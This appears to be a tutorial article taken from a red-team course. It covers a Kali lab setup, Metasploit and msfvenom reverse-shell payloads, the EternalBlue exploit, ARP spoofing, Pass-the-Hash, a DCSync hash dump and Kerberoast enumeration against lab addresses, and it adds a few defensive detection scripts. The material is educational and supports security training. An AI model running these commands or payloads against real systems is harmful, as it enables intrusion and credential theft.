Network Security Red Team Explained Simply (with Diagrams and Real Code)
Network Security Red Team: The Essentials in One Article — Real Code, Diagrams, and Concrete Steps, Excerpts from a 39-Lesson Course.
A guide that gets straight to the point: Network Security Red Team dissected with diagrams, concrete examples and tested commands. Everything comes from a structured 11-chapter course — here is the best of it.
- Prepare your Red Team lab
- Network security fundamentals
- Network reconnaissance and enumeration
- Exploitation and initial access
- Lateral movement and pivoting
Install Kali Linux and the virtual lab infrastructure
At the end of this lesson you will have: installed a hypervisor (VirtualBox or VMware), deployed Kali Linux in a properly isolated VM, configured a host-only network for the lab, and verified that the basic Red Team tools are working.
1. Hardware prerequisites
💾 Minimum viable
⚡ Comfortable
🏆 Ideal
On Windows:
systeminfo | findstr /i "Virtualization"
# Must show "Virtualization Enabled In Firmware: Yes". Otherwise enable VT-x/AMD-V in the BIOS/UEFI.
# (Filtering on "Hyper-V" only returns the section header line, not the firmware flag itself.)
# If Hyper-V, WSL2 or Docker Desktop is already active, systeminfo prints
# "A hypervisor has been detected" instead of these lines: that is the VirtualBox/Hyper-V conflict noted in the table below.
2. Choosing your hypervisor
| Hypervisor | Price | Host OS | Advantages | Disadvantages |
|---|---|---|---|---|
| VirtualBox 7.x | Free (GPL) | Win, macOS, Linux | Open-source, unlimited snapshots, GOAD-compatible | Average performance on Windows 11 |
| VMware Workstation Pro | Free (since 2024) | Win, Linux | Very fast, performant NAT | More complex to script |
| VMware Fusion Pro | Free (macOS) | macOS (Intel + Apple Silicon) | Native ARM64 support (M1/M2/M3) | Limitations on Apple Silicon (no Win x86) |
| Hyper-V | Included with Win Pro | Windows 10/11 Pro | Native performance | Limited snapshots, conflict with VBox |
| Proxmox VE | Free | Bare metal | Production-grade, web console | Requires a dedicated server |
Recommendation: VirtualBox for simplicity and portability (Mac/Win/Linux), or VMware Workstation Pro for performance. GOAD (Game of Active Directory) supports both natively via Ansible.
3. Installing VirtualBox
On Windows
# Download from https://www.virtualbox.org/wiki/Downloads
# Version 7.0.x (stable) or 7.1.x
# Silent install via winget
winget install -e --id Oracle.VirtualBox
# Verify the installation (VBoxManage is not added to PATH by the installer;
# use "%ProgramFiles%\Oracle\VirtualBox\VBoxManage.exe" or add that folder to PATH)
VBoxManage --version
# Should display: 7.0.x or 7.1.x
# Install the Extension Pack (USB 3.0, RDP, disk encryption). Same version as VirtualBox;
# PUEL licence, free for personal/educational use only.
# Download Oracle_VM_VirtualBox_Extension_Pack-7.x.vbox-extpack and give the exact file name
# (cmd.exe does not expand * wildcards)
VBoxManage extpack install Oracle_VM_VirtualBox_Extension_Pack-7.x.vbox-extpack
On macOS (Intel)
# Via Homebrew
brew install --cask virtualbox
brew install --cask virtualbox-extension-pack
# Approve the kext in System Preferences > Security (requires reboot)
On Linux (Ubuntu / Debian)
# Add the Oracle repository
wget -O- https://www.virtualbox.org/download/oracle_vbox_2016.asc | \
sudo gpg --dearmor -o /usr/share/keyrings/oracle-virtualbox-2016.gpg
echo "deb [arch=amd64 signed-by=/usr/share/keyrings/oracle-virtualbox-2016.gpg] \
https://download.virtualbox.org/virtualbox/debian $(lsb_release -cs) contrib" | \
sudo tee /etc/apt/sources.list.d/virtualbox.list
sudo apt update
sudo apt install -y virtualbox-7.0
# Verify
VBoxManage --version
4. Download Kali Linux
Kali Linux is the Debian-based distribution dedicated to offensive security. It includes more than 600 tools out of the box.
# Official page: https://www.kali.org/get-kali/
# Option 1: Pre-built VirtualBox VM (RECOMMENDED)
#   File   : kali-linux-2026.X-virtualbox-amd64.7z
#   Size   : ~3 GB
#   Benefit: VBox Guest Additions already installed
# Option 2: ISO installer
#   File   : kali-linux-2026.X-installer-amd64.iso
#   Size   : ~4 GB
#   Benefit: full control over the install
# Option 3: WSL (Windows Subsystem for Linux)
#   Benefit : Windows integration, lightweight
#   Drawback: no easy persistent Metasploit DB
# Integrity check (ALWAYS!)
sha256sum kali-linux-2026.*-virtualbox-amd64.7z
# Compare with the value published on kali.org
An unofficial mirror or torrent can serve a trojanized image. Always verify the SHA256 hash against the one published on the official site, and prefer the signed SHA256SUMS file to a hash copied from a web page: a compromised mirror can publish a matching hash next to its own image, but it cannot produce a valid signature with the Kali archive key.
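The check above as a small script, added here as an example rather than taken from the course. It verifies the detached GPG signature on the SHA256SUMS file when one is supplied, then looks the image up in that file and compares the hash, with distinct exit codes for mismatch, bad signature and missing entry. File names, the temporary fixture and the Kali URLs in the comments are assumptions for the lab; the "image" built by make_fixture is a constructed stand-in, not a real Kali download.

```shell
#!/bin/sh
# Added example (not course code): verify a downloaded Kali image against the
# SHA256SUMS file and, when provided, its detached GPG signature. Assumed inputs:
# the image, a SHA256SUMS file and an optional SHA256SUMS.gpg as published under
# https://cdimage.kali.org/kali-images/current/ (assumption: layout unchanged).
set -eu

# verify_image IMAGE SUMS [SUMS.gpg]
#   returns 0: hash matches; 1: mismatch; 2: bad signature; 3: image not listed
verify_image() {
  img=$1; sums=$2; sig=${3:-}
  name=$(basename "$img")
  if [ -n "$sig" ]; then
    # Requires the Kali archive key, e.g.:
    #   wget -q -O - https://archive.kali.org/archive-key.asc | gpg --import
    gpg --verify "$sig" "$sums" >/dev/null 2>&1 || { echo "BAD SIGNATURE on $sums" >&2; return 2; }
  fi
  # SHA256SUMS lines are "<hex>  <file>": match the file name exactly, not as a substring
  expected=$(awk -v f="$name" '$2 == f { print $1; exit }' "$sums")
  [ -n "$expected" ] || { echo "NOT LISTED: $name" >&2; return 3; }
  actual=$(sha256sum "$img" | awk '{ print $1 }')
  if [ "$expected" = "$actual" ]; then
    echo "OK $name $actual"
  else
    echo "MISMATCH $name expected=$expected actual=$actual" >&2
    return 1
  fi
}

# make_fixture: constructed stand-in for a download (NOT a real Kali image):
# a tiny file plus a SHA256SUMS generated from it. Prints the directory.
make_fixture() {
  dir=$(mktemp -d)
  printf 'constructed stand-in for the Kali 7z archive\n' > "$dir/kali-linux-2026.X-virtualbox-amd64.7z"
  ( cd "$dir" && sha256sum kali-linux-2026.X-virtualbox-amd64.7z > SHA256SUMS )
  echo "$dir"
}

# Real usage, with all three files downloaded next to each other:
#   verify_image kali-linux-2026.X-virtualbox-amd64.7z SHA256SUMS SHA256SUMS.gpg
```

The signature check is the step most people skip: without it the hash only proves the download matches whatever the mirror chose to publish.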
5. Import the pre-built Kali VM
# 1. Extract the archive
7z x kali-linux-2026.X-virtualbox-amd64.7z
# "7z: command not found"? Install: sudo apt install p7zip-full
# 2. Register the VM in VirtualBox (option A: GUI)
#    The pre-built image is a ready-made .vbox + .vdi pair, not an OVA:
#    Machine > Add... > select the .vbox (File > Import Appliance is for .ova/.ovf files)
# 3. Register via CLI (option B: script)
VBoxManage registervm "$PWD/kali-linux-2026.X-virtualbox-amd64/kali-linux-2026.X-virtualbox-amd64.vbox"
# The machine keeps the name stored in the .vbox; rename it for the lab
VBoxManage modifyvm "kali-linux-2026.X-virtualbox-amd64" --name "Kali-Red-Team"
# 4. List VMs
VBoxManage list vms
# Should display: "Kali-Red-Team" {uuid}
Recommended settings before first boot
VM="Kali-Red-Team"
# Allocate 4 CPUs and 6 GB RAM
VBoxManage modifyvm "$VM" --cpus 4 --memory 6144
# Bidirectional shared clipboard and drag & drop (convenient, but it weakens isolation:
# set both to "disabled" before running untrusted samples inside the VM)
VBoxManage modifyvm "$VM" --clipboard-mode bidirectional --draganddrop bidirectional
# Video acceleration
VBoxManage modifyvm "$VM" --vram 128 --graphicscontroller vmsvga --accelerate3d on
# USB: base controller (1.1) plus EHCI (2.0) and xHCI (3.0); xHCI needs the Extension Pack on 7.0
VBoxManage modifyvm "$VM" --usb on --usbehci on --usbxhci on
# Fixed MAC address (stable DHCP lease and ARP entries across snapshot restores)
VBoxManage modifyvm "$VM" --macaddress1 080027AA1010
Metasploit Framework — network exploit modules
At the end of this lesson you will know how to navigate Metasploit Framework (msfconsole), select the right network exploit modules, choose a suitable payload, start a handler, and obtain a Meterpreter session on a vulnerable lab target.
1. Why Metasploit?
Metasploit Framework (MSF) is the exploitation framework most widely used in the world. It brings together more than 2 300 exploits, 1 500 payloads, 700 auxiliary modules and 600 post-exploitation modules.
✅ Strengths of Metasploit
⚠️ Limitations to know
Excellent for: educational pentesting, classic network CVEs (SMB, RPC, web RCE), basic pivoting. Less suitable for: modern stealthy Red Team ops (prefer Sliver, Mythic, Havoc).
2. Metasploit structure
/usr/share/metasploit-framework/
├── modules/
│   ├── exploits/    # 2300+ exploits by OS / service
│   ├── payloads/    # 1500+ payloads
│   ├── auxiliary/   # Scanners, brute force, sniffers
│   ├── post/        # Post-exploitation modules
│   ├── encoders/    # Payload obfuscation (poor AV effectiveness)
│   ├── nops/        # NOP sleds
│   └── evasion/     # Anti-AV modules
└── data/            # Wordlists, templates
Module categories
| Type | Description | Example |
|---|---|---|
| exploit | Code that exploits a vulnerability | exploit/windows/smb/ms17_010_eternalblue |
| auxiliary | Scanners, fuzzers, brute force, DoS | auxiliary/scanner/smb/smb_login |
| payload | Code sent after the exploit (shell, meterpreter) | windows/x64/meterpreter/reverse_https |
| post | Actions after a session is opened | post/windows/gather/hashdump |
| encoder | Payload obfuscation | x86/shikata_ga_nai |
| evasion | Bypass AV/Defender | windows/windows_defender_exe |
3. First steps in msfconsole
# 1. Start the PostgreSQL database and initialise the MSF database
sudo systemctl start postgresql     # add "enable" to start it at boot
sudo msfdb init                     # once only
# 2. Launch msfconsole with database enabled
msfconsole -q
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.
# 3. Create a workspace per mission (CRUCIAL)
msf6 > workspace -a mission_lab
msf6 > workspace
# * mission_lab   <- the star = active workspace
# 4. Import an Nmap scan (XML output from nmap -oX)
msf6 > db_import /tmp/enriched.xml
msf6 > hosts
msf6 > services -p 445
# 5. Search for a module
msf6 > search type:exploit eternalblue
msf6 > search name:bluekeep platform:windows
msf6 > search cve:2017-0144
# 6. Full help
msf6 > help
msf6 > info exploit/windows/smb/ms17_010_eternalblue
4. Anatomy of a Metasploit exploit
# Standard sequence to RUN AN EXPLOIT
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > show options
msf6 exploit(...) > show targets
msf6 exploit(...) > show payloads
# Configure the REQUIRED options (Required: yes)
msf6 exploit(...) > set RHOSTS 192.168.56.20
msf6 exploit(...) > set RPORT 445
# Choose a suitable payload
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_https
msf6 exploit(...) > set LHOST 192.168.56.10   # your Kali: the lab-facing interface, not the NAT one
msf6 exploit(...) > set LPORT 8443
# Verify the options
msf6 exploit(...) > show options
# (Optional) verify that the target is vulnerable; not every module implements check
msf6 exploit(...) > check
# [+] 192.168.56.20:445 - The target is vulnerable.
# Launch! EternalBlue corrupts kernel pool memory: a failed attempt can BSOD the target,
# so take a snapshot of the lab VM first.
msf6 exploit(...) > run
# [*] Started HTTPS reverse handler on https://192.168.56.10:8443
# [*] Sending stage (203846 bytes) to 192.168.56.20
# [*] Meterpreter session 1 opened ...
meterpreter >
5. Choosing the right payload
Naming conventions
windows/x64/meterpreter/reverse_https
^^^^^^^ ^^^ ^^^^^^^^^^^ ^^^^^^^^^^^^^
  OS   arch    Type       Transport
windows       : Windows
x64           : 64-bit architecture
meterpreter   : advanced payload (vs. a plain «shell»)
reverse_https : encrypted outbound connection from the target to the attacker
# The separator between type and transport also matters:
# meterpreter/reverse_https (slash)      = STAGED: a small stager fetches the Meterpreter stage from the handler at run time
# meterpreter_reverse_https (underscore) = STAGELESS: the whole payload is in the file (larger, no stage download;
#                                          preferred for drop-and-wait payloads and where the stage download is a detection risk)
Main transports
| Transport | Direction | Stealth | When to use |
|---|---|---|---|
| reverse_tcp | Target → Attacker (custom port) | Low (suspicious traffic) | Lab, open outbound port |
| reverse_https | Target → Attacker (encrypted 443) | Good (legitimate TLS) | Standard corporate network |
| reverse_http | Target → Attacker (80) | Medium (clear-text HTTP) | If HTTPS is blocked |
| bind_tcp | Attacker → Target (custom port) | Low (target listens) | Reverse NAT, direct target exposure |
| reverse_dns | Tunnel via DNS | Very good (rare) | Highly segmented network |
| reverse_winhttps | HTTPS via WinHTTP (cert pinning) | Excellent | Bypass enterprise proxy |
In the lab: reverse_tcp on 4444 (fast).
On an internal engagement: reverse_https on 443 (passes firewalls/proxies). The handler's default self-signed certificate is a well-known signature, so set HandlerSSLCert to a certificate of your own.
If there is a corporate proxy: reverse_winhttps, which respects the system proxy settings.
6. Multi/handler — receive sessions independently
The multi/handler module is a “generic receiver” that listens for payloads generated separately (with msfvenom).
msf6 > use multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST 192.168.56.10
msf6 exploit(multi/handler) > set LPORT 443     # privileged port: run msfconsole as root, or listen on >= 1024 behind a redirector
msf6 exploit(multi/handler) > set ExitOnSession false
msf6 exploit(multi/handler) > run -j     # -j = background job
# View active jobs
msf6 > jobs
# Stop a job
msf6 > jobs -k 1
# Interact with a session that called back
msf6 > sessions -i 1
Generate a payload with msfvenom
# Windows EXE
msfvenom -p windows/x64/meterpreter/reverse_https \
LHOST=192.168.56.10 LPORT=443 \
-f exe -o /tmp/payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.56.10 LPORT=4444 \
-f elf -o /tmp/payload
# PowerShell one-liner
msfvenom -p windows/x64/meterpreter/reverse_https \
LHOST=192.168.56.10 LPORT=443 \
-f psh-cmd
# DLL injection
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.56.10 LPORT=4444 \
-f dll -o /tmp/payload.dll
# Raw shellcode (for a custom loader)
msfvenom -p windows/x64/meterpreter/reverse_https \
LHOST=192.168.56.10 LPORT=443 \
-f raw -o /tmp/shellcode.bin
# Encoded with x64/xor_dynamic (shikata_ga_nai is x86-only). Encoders exist to avoid
# bad characters, not to evade AV: modern engines flag the decoder stub itself.
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.56.10 LPORT=4444 \
-e x64/xor_dynamic -i 10 \
-f exe -o /tmp/encoded.exe
Critical protocols for Red Team
At the end of this lesson you will know how the 7 fundamental protocols of a Windows enterprise network work and what exploitable weaknesses they have: ARP, DNS, SMB, LDAP, Kerberos, RDP and WinRM. You will be able to identify them in Wireshark and recognize which attacks each one enables.
1. ARP — the first weak link
ARP (Address Resolution Protocol) translates IP to MAC on a LAN. Without authentication it is the number-one target on an internal network.
# View the local ARP cache
ip neigh show      # or: arp -an
# Poison a target's cache (lab only). bettercap needs raw sockets, hence sudo;
# fullduplex poisons both the target and the gateway so both directions pass through Kali
sudo bettercap -iface eth1
> set arp.spoof.targets 192.168.56.20
> set arp.spoof.fullduplex true
> arp.spoof on
> net.sniff on
# View intercepted traffic in Wireshark
sudo wireshark -i eth1
Exploitable ARP weaknesses
Defenses: DAI (Dynamic ARP Inspection) on Cisco/HP switches, 802.1X, a static ARP entry for the critical gateway, or simply end-to-end encryption (TLS, VPN) that renders interception harmless.
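What the bettercap run above looks like from the other side, as an added example that is not part of the course: a sensor or the target itself captures ARP with tcpdump and flags any IP that is announced by more than one MAC, which is exactly the footprint of a poisoning run. The capture is constructed for this article, not a real one; 08:00:27:aa:10:10 is the fixed MAC assigned to the Kali VM in the lab setup, and the other addresses are assumptions.

```shell
#!/bin/sh
# Added example (not course code): detect ARP poisoning from a tcpdump capture.
# arp_conflicts reads `tcpdump -lni eth1 arp` output and reports every IP that
# was announced by more than one MAC address during the capture.
set -eu

# Constructed sample (not a real capture): the real gateway answers first, then
# the Kali VM (08:00:27:aa:10:10) claims the gateway's address; .20 is clean.
SAMPLE_ARP='12:00:01.000001 ARP, Reply 192.168.56.1 is-at 08:00:27:11:22:33, length 28
12:00:01.500000 ARP, Request who-has 192.168.56.20 tell 192.168.56.1, length 28
12:00:02.000001 ARP, Reply 192.168.56.1 is-at 08:00:27:aa:10:10, length 28
12:00:02.000002 ARP, Reply 192.168.56.1 is-at 08:00:27:aa:10:10, length 28
12:00:03.000001 ARP, Reply 192.168.56.20 is-at 08:00:27:44:55:66, length 28'

# arp_conflicts: stdin = tcpdump ARP lines; stdout = "<ip>: <mac> <mac> ..." for
# each IP seen with more than one MAC. Requests are ignored; only replies
# (solicited or gratuitous) change a victim's cache.
arp_conflicts() {
  awk '
    $2 == "ARP," && $3 == "Reply" {
      ip = $4; mac = $6; sub(/,$/, "", mac)
      if (!((ip, mac) in seen)) { seen[ip, mac] = 1; macs[ip] = macs[ip] " " mac; n[ip]++ }
    }
    END { for (ip in n) if (n[ip] > 1) print ip ":" macs[ip] }'
}

# Live:    sudo tcpdump -lni eth1 arp | arp_conflicts
# Offline demo on the constructed sample:
printf '%s\n' "$SAMPLE_ARP" | arp_conflicts
```

A second MAC for the gateway is the signal; the first MAC in the list is usually the legitimate one, but confirm it against the gateway MAC recorded at baseline (ip neigh on a known-good host, or the switch's CAM table) rather than trusting arrival order.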
2. DNS — the chatty directory
DNS is used not only for name resolution; it also reveals the Active Directory topology via SRV records.
# Find the DC of a domain via DNS
dig _ldap._tcp.dc._msdcs.lab.local SRV
dig _kerberos._tcp.lab.local SRV
dig _gc._tcp.lab.local SRV # Global Catalog
# Find all machines in a domain (Zone Transfer if allowed)
dig @192.168.56.10 lab.local AXFR
# Reverse DNS on a /24
for ip in 192.168.56.{1..254}; do
host $ip 2>/dev/null | grep -v NXDOMAIN
done
# Dynamic DNS: register a name (lab only, if allowed)
# AD DNS defaults to "secure dynamic updates only", so authenticate with Kerberos (GSS-TSIG);
# a BIND-style TSIG key file would be "nsupdate -k key.conf" instead
kinit jon.snow@LAB.LOCAL
nsupdate -g <<EOF
server 192.168.56.10
update add evil.lab.local 60 A 192.168.56.99
send
EOF
Red Team DNS attacks
| Attack | Description | Tools |
|---|---|---|
| Zone transfer (AXFR) | If allowed, full zone dump | dig, dnsenum |
| DNS spoofing / cache poisoning | Answer queries faster than the real resolver, or poison its cache | dnsspoof (dsniff), mitm6 (takes over DNS via a rogue DHCPv6 server) |
| DNS subdomain enum | Discover subdomains (external recon) | amass, subfinder, sublist3r |
| DNS tunneling C2 | Exfiltrate/control via DNS queries | iodine, dnscat2 |
| NS records hijack | Take over an abandoned (dangling) NS delegation | dig (check whether each NS target still resolves) |
3. SMB — the Red Team Swiss Army knife
SMB (Server Message Block) = file sharing, printer sharing, remote execution, RPC transport. It is THE Windows attack protocol.
# Enumeration: version, OS, shares, users
# (crackmapexec is unmaintained; NetExec, `nxc`, is its successor with the same syntax)
crackmapexec smb 192.168.56.0/24
crackmapexec smb 192.168.56.10 -u jon.snow -p 'Winter2026!' --shares
crackmapexec smb 192.168.56.10 -u '' -p '' --users     # Null session
# List shares with smbclient (a password on the command line lands in shell history
# and in ps output: "-U jon.snow" alone prompts for it instead)
smbclient -L //192.168.56.10/ -U jon.snow%'Winter2026!'
# Connect to a share
smbclient //192.168.56.10/Public -U jon.snow%'Winter2026!'
smb: \> ls
smb: \> get secret_file.txt
# Mount the share
sudo mount -t cifs //192.168.56.10/Public /mnt/smb \
-o username=jon.snow,password='Winter2026!',vers=3.0
Iconic SMB attacks
🏭 Pre-auth (no creds)
🔐 Post-auth (with creds)
# Test a host for EternalBlue
nmap --script smb-vuln-ms17-010 -p 445 192.168.56.0/24
# Metasploit exploitation (lab only)
msfconsole -q
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.56.20
msf6 > run
# Lateral movement PSExec with NT hash (Pass-the-Hash)
impacket-psexec -hashes :32ED87BDB5FDC5E9CBA88547376818D4 \
administrator@192.168.56.10
# Dump hashes via DCSync (requires replication rights: DA, or any account holding
# DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object)
impacket-secretsdump lab.local/administrator:'Pass!'@192.168.56.10 -just-dc
4. LDAP — the transparent directory
LDAP (port 389/636) exposes everything in AD: users, groups, GPOs, OUs, ACLs. A simple domain authentication is usually enough to query it. Note that a simple bind over ldap:// sends the password in clear text, and a DC that requires LDAP signing or channel binding rejects it; in that case use ldaps:// on 636, or Kerberos (`-Y GSSAPI` after `kinit`) instead of `-x`.
# Search for users
ldapsearch -x -H ldap://192.168.56.10 \
-D "jon.snow@lab.local" -w 'Winter2026!' \
-b "DC=lab,DC=local" -s sub "(&(objectClass=user)(objectCategory=person))" \
sAMAccountName description
# Search for Kerberoastable accounts (user objects with an SPN; krbtgt excluded, its TGS is not crackable in practice)
ldapsearch -x -H ldap://192.168.56.10 \
-D "jon.snow@lab.local" -w 'Winter2026!' \
-b "DC=lab,DC=local" "(&(samAccountType=805306368)(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))" \
sAMAccountName servicePrincipalName
# Search for AS-REP roastable accounts
# (:1.2.840.113556.1.4.803: is the bitwise-AND matching rule; 4194304 = UAC flag DONT_REQ_PREAUTH)
ldapsearch -x -H ldap://192.168.56.10 \
-D "jon.snow@lab.local" -w 'Winter2026!' \
-b "DC=lab,DC=local" "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" \
sAMAccountName
# Search the schema (all classes). AD allows anonymous reads of rootDSE only, so bind here too
ldapsearch -x -H ldap://192.168.56.10 \
-D "jon.snow@lab.local" -w 'Winter2026!' \
-b "CN=Schema,CN=Configuration,DC=lab,DC=local" cn
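The two roasting filters above rely on the same idea: userAccountControl is a bitmask, and the :1.2.840.113556.1.4.803: rule tests one bit of it. The script below, added as an example and not course code, applies the same bit tests offline to an LDIF export (ldapsearch -LLL with sAMAccountName, userAccountControl and servicePrincipalName), so a single directory pull can be triaged without re-querying the DC for every condition. The LDIF is constructed for the lab.local domain of this article and is not real directory output.

```shell
#!/bin/sh
# Added example (not course code): classify AD users from an LDIF export using
# the userAccountControl bitmask, offline. Assumes -LLL style output with one
# blank line between entries; the sample below is constructed for lab.local.
set -eu

SAMPLE_LDIF='dn: CN=jon.snow,CN=Users,DC=lab,DC=local
sAMAccountName: jon.snow
userAccountControl: 66048

dn: CN=svc_sql,CN=Users,DC=lab,DC=local
sAMAccountName: svc_sql
userAccountControl: 4260352
servicePrincipalName: MSSQLSvc/sql01.lab.local:1433

dn: CN=old.user,CN=Users,DC=lab,DC=local
sAMAccountName: old.user
userAccountControl: 514

dn: CN=krbtgt,CN=Users,DC=lab,DC=local
sAMAccountName: krbtgt
userAccountControl: 514
servicePrincipalName: kadmin/changepw'

# emit_uac: print "<sam> <flags>" for the entry collected so far.
# UAC bits (decimal): 2 ACCOUNTDISABLE, 65536 DONT_EXPIRE_PASSWORD, 4194304 DONT_REQ_PREAUTH
emit_uac() {
  [ -n "$sam" ] || return 0
  uac=${uac:-0}; flags=""
  [ $((uac & 2)) -ne 0 ]       && flags="$flags DISABLED"
  [ $((uac & 65536)) -ne 0 ]   && flags="$flags PASSWORD_NEVER_EXPIRES"
  [ $((uac & 4194304)) -ne 0 ] && flags="$flags ASREP_ROASTABLE"
  # Kerberoastable = user object carrying an SPN; krbtgt excluded as in the ldapsearch filter
  [ "$spn" -eq 1 ] && [ "$sam" != "krbtgt" ] && flags="$flags KERBEROASTABLE"
  printf '%s%s\n' "$sam" "$flags"
}

# classify_uac: stdin = LDIF; one output line per entry.
# Limitation: base64 attributes ("::") and folded continuation lines are not handled.
classify_uac() {
  sam=""; uac=""; spn=0
  while IFS= read -r line || [ -n "$line" ]; do
    case "$line" in
      "sAMAccountName: "*)       sam=${line#sAMAccountName: } ;;
      "userAccountControl: "*)   uac=${line#userAccountControl: } ;;
      "servicePrincipalName: "*) spn=1 ;;
      "") emit_uac; sam=""; uac=""; spn=0 ;;
    esac
  done
  emit_uac
}

# Real input:  ldapsearch -LLL -x -H ldap://192.168.56.10 -D ... -w ... -b "DC=lab,DC=local" \
#                "(objectCategory=person)" sAMAccountName userAccountControl servicePrincipalName | classify_uac
printf '%s\n' "$SAMPLE_LDIF" | classify_uac
```

Disabled accounts still show up as Kerberoastable in a naive SPN search, which is why the DISABLED flag is printed alongside: a TGS for a disabled account is not issued, so those entries are noise in a roasting list.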
BloodHound: LDAP as a graph
# Full collection from Kali (-c All includes session and local-group enumeration, which
# connects to every reachable host and is noisy; -c DCOnly queries only the DC for a quiet first pass)
bloodhound-python -u jon.snow -p 'Winter2026!' -d lab.local \
-ns 192.168.56.10 -c All --zip
# Start Neo4j and BloodHound GUI
sudo neo4j start
bloodhound
# Drag & drop the .zip into the interface
# Query: Shortest path to Domain Admins
# Query: Find Kerberoastable Users
This article covers the most useful excerpts — the complete Network Security Red Team course (11 chapters, 39 lessons, corrected exercises and final project) takes you all the way.
FAQ
How long does it take to learn Network Security Red Team?
Are there any prerequisites?
Where to start concretely?